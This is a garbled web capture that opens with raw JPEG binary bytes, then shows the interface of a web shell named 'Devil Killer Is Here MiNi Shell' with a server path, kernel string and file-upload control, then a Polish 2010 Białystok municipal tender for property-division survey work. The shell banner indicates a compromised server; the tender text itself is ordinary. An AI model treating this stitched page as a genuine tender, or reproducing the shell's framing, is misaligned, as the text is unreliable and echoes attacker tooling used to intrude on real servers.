JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100210/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100210/37304-N-2010.html

<p class="kh_header"><b>Białystok: OPRACOWANIE PROJEKTÓW PODZIAŁÓW NIERUCHOMOŚCI 
NA TERENIE MIASTA BIAŁEGOSTOKU</b><br>
<b>Numer ogłoszenia: 37304 - 2010; data zamieszczenia: 10.02.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miasto Białystok , ul. Słonimska 1, 15-950 Białystok, woj. podlaskie, tel. 085 869 60 02, faks 085 869 62 65.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bialystok.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> OPRACOWANIE PROJEKTÓW PODZIAŁÓW NIERUCHOMOŚCI 
NA TERENIE MIASTA BIAŁEGOSTOKU.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest opracowanie projektów podziałów nieruchomości w celu:

1.1.  realizacji następujących inwestycji:

CZĘŚĆ I
Ścieżka rowerowa do Hryniewicz - 3 działki 
CZĘŚĆ II
Budowa ulicy pomiędzy ul. Nowowarszawską a ul. Zaściańską -  2 działki
CZĘŚĆ III
Osiedle Bagnówka (rejon ul. Boruty ) - 5 działek
CZĘŚĆ IV
Ul. Mikołajczyka - 15 działek
CZĘŚĆ V
Ul. P. Łodzińskiego ( na odcinku od ul. Cementowej do ul. Oboźnej ), ul. Cementowa ( na odcinku od ul. Starosielce do ul. P. Łodzińskiego ) - 32 działki
CZĘŚĆ VI
Ul. Niska - 10 działek
CZĘŚĆ VII
Ul. Antoniukowska - 1 działka
CZĘŚĆ VIII
Ul. Suchowolca, ul. Zabłudowska - 10 działek
CZĘŚĆ IX
Ul. Antoniuk Fabryczny - 1 działka
CZĘŚĆ X
Budowa ulic w rejonie Białostockiego Parku Naukowo-Technologicznego - 2 działki
CZĘŚĆ XI
Ul. Kasztanowa - 4 działki




1.2. zbycia i nabycia

CZĘŚĆ XII
Ulice: B. Chrobrego obr.17 dz. nr 1110/14, Al. Konstytucji 3-go Maja obr.2 dz. nr 1363/7, Łagodna obr.2 dz. nr 1757, Z. Herberta obr.1 dz. nr 1463/22, Pogodna obr.8 dz. nr 184/55, Drewniana obr.10 dz. nr 34/14, Legionowa obr.11 dz. nr 1246/7, 1246/16, 1246/15, 1246/13, 1135/1, 1246/8, Kozłowa obr.12 dz. nr 683/1, 686/2, Jesienna obr.16 dz. nr 1230, Sandomierska obr.16 dz. nr 1226/7, Krańcowa obr.16 dz. nr 1226/11, Knyszyńska obr.3 dz. nr 532, 533, Poleska obr.11 dz. nr 231, Ks. Grzybowskiego obr.6 dz. nr 438, Wołyńska obr.19 dz. nr 316/1, 317/1, 318/1, 319/1, 342, Starobojarska obr.17 dz. nr 564/1, W. Pola obr.15 dz. nr 63/50 , A. Mickiewicza obr.21 dz. nr 762/31, Sosnowa obr.11 dz. nr 435/2 - 30 działek
CZĘŚĆ XIII
Ulice: Marjańskiego obr.11 dz. nr 1690/48, 1690/49, Mazowiecka obr.11 dz. nr 1019, Antoniuk Fabryczny obr.2 dz. nr 1201/4, 1201/9, J.K. Kluka obr.15 dz. nr 20/10, Zgoda obr.14 dz. nr 1215, Bacieczki obr.4 dz. nr 97/4, Ciołkowskiego obr.18 dz. nr 1552, 1553, 1554, 1555, 1556, 1557, 1558, 1559/2, 1560/2, 1561, 1562/2, 1563/2, Tuwima obr.3 dz. nr 401/14, Drewniana obr.10 dz. nr 359/2, 341/2, Baranowicka obr.20 dz. nr 15/2, Rybnika obr.6 dz. nr 1238/2, Św. A. Boboli obr.6 dz. nr 1290, 1292, 1293, Plażowa obr.20 dz. nr 1245/23, Hetmańska obr.6 dz. nr 204/2, Szwajcarska, Portugalska obr.6 dz. nr 994, 996, 3845/54, Marczukowska obr.4 dz. nr 794/3, Leńskiego obr.15 dz. nr 862/2, Wietnamska obr.6 dz. nr 2004, Zbożowa obr.19 dz. nr 1290/2, Skalna obr.15 dz. nr 10/16, Al. Piłsudskiego obr.11 dz. nr 1288/13, Białówny obr.11 dz. nr 1340/5, M. Skłodowskiej-Curie obr.11 dz. nr 1847, Mickiewicza obr.10 dz. nr 600/3, Radzymińska obr.12 dz. nr 678, Nowogródzka obr.17 dz. nr 33/2, Warszawska obr.17 dz. nr 364/2, Spacerowa obr.17 dz. nr 1076, Pułkowa obr.16 dz. nr 1498, Lipowa obr.11 dz. nr 1652/3, Skwer Armii Krajowej obr.11 dz. nr 1468/8, Krasińskiego obr.11 dz. nr 1848/7, Bema obr.11 dz. nr 845/3, Zacisze obr.18 dz. nr 36/20, Żeleńskiego obr.15 dz. nr 378/2, Chełmońskiego obr.15 dz. nr 835, Świętojańska obr.11 dz. nr 1774/11, Sobieskiego obr.17 dz. nr 522/10, Bagnówka obr.15 dz. nr 157/2, Komarowa, NMP Królowej Rodzin obr.1 dz. nr 876, Kawaleryjska obr.9 dz. nr 772/2, Sokólska obr.12 dz. nr 559/2, Kijowska obr.11 dz. nr 490/3, Sienkiewicza obr.11 dz. nr 1417/9, Św. Rocha obr.11 dz. nr 1521/1, M. Skłodowskiej-Curie obr.11 dz. nr 1248/2, Krasnoludków obr.14 dz. nr 1655/59, Niemeńska obr.15 dz. nr 1869, Bagnówka - kolonia obr.15 dz. nr 11/23, Dźwińska obr.15 dz. nr 1876, Malachitowa obr.15 dz. nr 28/6, Prypecka obr.15 dz. nr 1998, Poleska obr.17 dz. nr 39/8, H. Kołłątaja obr.2 dz. nr 1661/14, 1685/8, 1644/7, 1685/5, Gen. A. E. Fieldorfa obr.6 dz. nr 2025, Nadbużańska obr.15 dz. nr 1579/3, Warsztatowa obr.6 dz. nr 3823, Makowa obr.16 dz. nr 632, Polska obr.6 dz. nr 560, Fredry obr.16 dz. nr 597/1, Sienkiewicza obr.17 dz. nr 342, Bema obr.8 dz. nr 156/2, Warszawska obr.17 dz. nr 1110/120, Pułkowa, Kapralska obr.16 dz. nr 1498, Pułaskiego obr.9 dz. nr 341/2, 11-go Listopada obr.11 dz. nr 1995, M. Skłodowskiej-Curie obr.11 dz. nr 1821/2, Antoniuk Fabryczny obr.2 dz. nr 695/1, 699/8, Świętojańska obr.17 dz. nr 1114/9, 1114/11, 1114/8, 1120/2, 1120/3, Malmeda obr.11 dz. nr 1397, Borsucza obr.21 dz. nr 706/2, Plażowa obr.20 dz. nr 1245/20, 1245/21, J. K. Kluka obr.15 dz. nr 140/6, I Armii Wojska Polskiego obr.12 dz. nr 461/2, obr.18 dz. nr 93/23, 93/39, 93/37, 93/31, 93/114, 106/18, 106/19, obr.11 dz. nr 104/11, Ogrodowa obr.17 dz. nr 193, obr.21 dz. nr 767/13, 771/17, 771/18, 767/10, 762/47, 762/49  - 116 działek

2. Opracowanie projektu podziału należy wykonać zgodnie z Rozporządzeniem Rady Ministrów z dnia 07.12.2004 r. (Dz. U z 2004 r. Nr  268 poz. 2663)  w sprawie sposobu i trybu dokonywania podziałów nieruchomości oraz z uwzględnieniem sposobu postępowania przy sporządzaniu dokumentów wymaganych w tym postępowaniu  ich rodzaju i treści, ustawą o gospodarce nieruchomościami (Dz. U. z 2004 r. Nr 261 poz.2603 z późn. zm.) z tym, że przyjęcie przebiegu granic powinno być przeprowadzone przy udziale właścicieli (władających) nieruchomości niezależnie od jej stanu prawnego.

3. Okazanie granic powinno odbywać się przy współudziale przedstawiciela Gminy Białystok              i zainteresowanych stron niezależnie czyją własność stanowią nieruchomości. Wymagana jest trwała stabilizacja nowo powstałych punktów granicznych

4. Zamawiający zastrzega możliwość zmniejszenia prac określonych w rozdz. I  pkt.1 SIWZ..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 71.25.00.00-5.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 13.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.11.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>w celu potwierdzenia spełnienia warunku Wykonawca winien przedłożyć wykaz wykonanych usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeśli okres prowadzenia działalności jest krótszy - w tym okresie, na wykonanie co najmniej dziesięciu podziałów działek z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentów potwierdzających, że usługi  te zostały wykonane należycie - wzór Załącznik Nr 4 do SIWZ;</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>w celu potwierdzenia spełnienia warunku Wykonawca winien przedłożyć wykaz minimum dwóch osób posiadających uprawnienia geodezyjne z zakresu 1, 2, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami - wzór Załącznik Nr 3 do SIWZ;</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1) formularz ofertowy wzór Załącznik Nr 4 do SIWZ,
2)  pełnomocnictwo (w przypadku, gdy oferta została podpisana przez pełnomocnika lub gdy ofertę składają wykonawcy wspólnie ubiegający się o udzielenie zamówienia zgodnie z art. 23 ustawy Pzp).</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.bialystok.pl ;<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Białymstoku , Departament Geodezji , Ul. Słonimska 2/2,
15-950 Białystok, pokój 151; faks 085/869 6317, e-mail: zorzelowska@um.bialystok.pl.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 22.02.2010 godzina 11:45, miejsce: Urząd Miejski w Białymstoku 
ul. Słonimska 1 pokój nr 501.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Ścieżka rowerowa do Hryniewicz.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Ścieżka rowerowa do Hryniewicz -3 działki.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.25.00.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2010.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Budowa ulicy pomiędzy ul. Nowowarszawską a ul. Zaściańską.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Budowa ulicy pomiędzy ul. Nowowarszawską a ul. Zaściańską -2 działki.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.25.00.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2010.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Osiedle Bagnówka (rejon ul. Boruty ).</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Osiedle Bagnówka (rejon ul. Boruty )-5 działek.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.25.00.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2010.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Ul. Mikołajczyka.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Ul. Mikołajczyka -15 działek.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.25.00.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2010.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Ul. P. Łodzińskiego ( na odcinku od ul. Cementowej do ul. Oboźnej ), ul. Cementowa ( na odcinku od ul. Starosielce do ul. P. Łodzińskiego ).</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Ul. P. Łodzińskiego ( na odcinku od ul. Cementowej do ul. Oboźnej ), ul. Cementowa ( na odcinku od ul. Starosielce do ul. P. Łodzińskiego )-32 działki.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.25.00.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2010.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Ul. Niska.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Ul. Niska -10 działek.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.25.00.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2010.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Ul. Antoniukowska.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Ul. Antoniukowska -1 działka.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.25.00.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2010.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> Ul. Suchowolca, ul. Zabłudowska.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Ul. Suchowolca, ul. Zabłudowska -10 działek.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.25.00.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2010.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 9 <b>NAZWA:</b> Ul. Antoniuk Fabryczny.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Ul. Antoniuk Fabryczny -1 działka.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.25.00.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2010.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 10 <b>NAZWA:</b> Budowa ulic w rejonie Białostockiego Parku Naukowo-Technologicznego.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Budowa ulic w rejonie Białostockiego Parku Naukowo-Technologicznego -2 działki.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.25.00.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2010.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 11 <b>NAZWA:</b> Ul. Kasztanowa.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Ul. Kasztanowa -4 działki.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.25.00.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2010.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 12 <b>NAZWA:</b> zbycia i nabycia.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Ulice: B. Chrobrego obr.17 dz. nr 1110/14, Al. Konstytucji 3-go Maja obr.2 dz. nr 1363/7, Łagodna obr.2 dz. nr 1757, Z. Herberta obr.1 dz. nr 1463/22, Pogodna obr.8 dz. nr 184/55, Drewniana obr.10 dz. nr 34/14, Legionowa obr.11 dz. nr 1246/7, 1246/16, 1246/15, 1246/13, 1135/1, 1246/8, Kozłowa obr.12 dz. nr 683/1, 686/2, Jesienna obr.16 dz. nr 1230, Sandomierska obr.16 dz. nr 1226/7, Krańcowa obr.16 dz. nr 1226/11, Knyszyńska obr.3 dz. nr 532, 533, Poleska obr.11 dz. nr 231, Ks. Grzybowskiego obr.6 dz. nr 438, Wołyńska obr.19 dz. nr 316/1, 317/1, 318/1, 319/1, 342, Starobojarska obr.17 dz. nr 564/1, W. Pola obr.15 dz. nr 63/50 , A. Mickiewicza obr.21 dz. nr 762/31, Sosnowa obr.11 dz. nr 435/2 - 30 działek.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.25.00.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2010.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
